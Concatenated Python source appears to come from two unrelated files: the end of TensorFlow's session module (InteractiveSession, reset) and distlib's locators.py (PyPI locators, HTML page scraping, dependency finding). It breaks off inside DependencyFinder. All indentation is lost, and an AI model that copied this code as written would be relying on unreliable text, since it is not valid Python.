# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
Args:
target: The execution engine to connect to.
containers: A list of resource container name strings, or `None` if all of
all the containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
|
locators.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy, normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
try:
return client.list_packages()
finally:
client('close')()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None: # pragma: no cover
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except self.errors.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme == 'https', 'pypi.python.org' in t.netloc,
is_downloadable, is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename in project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='): # pragma: no cover
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/': # pragma: no cover
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if not is_compatible(wheel, self.wheel_tags):
logger.debug('Wheel not compatible: %s', path)
else:
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e: # pragma: no cover
logger.warning('invalid path for wheel: %s', path)
elif not path.endswith(self.downloadable_extensions): # pragma: no cover
logger.debug('Not downloadable: %s', path)
else: # downloadable extension
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t: # pragma: no cover
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver: # pragma: no cover
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at keys of the form
'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None: # pragma: no cover
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug('skipping pre-release '
'version %s of %s', k, matcher.name)
except Exception: # pragma: no cover
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd: # pragma: no cover
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(d)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O,
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
self.platform_check = False # See issue #112
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.setDaemon(True)
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux_(i\d86|x86_64|arm\w+)|'
r'win(32|_amd64)|macosx_?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self.platform_check and self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
try:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
except MetadataInvalidError: # e.g. invalid versions
pass
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched,
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=data.get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.python.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
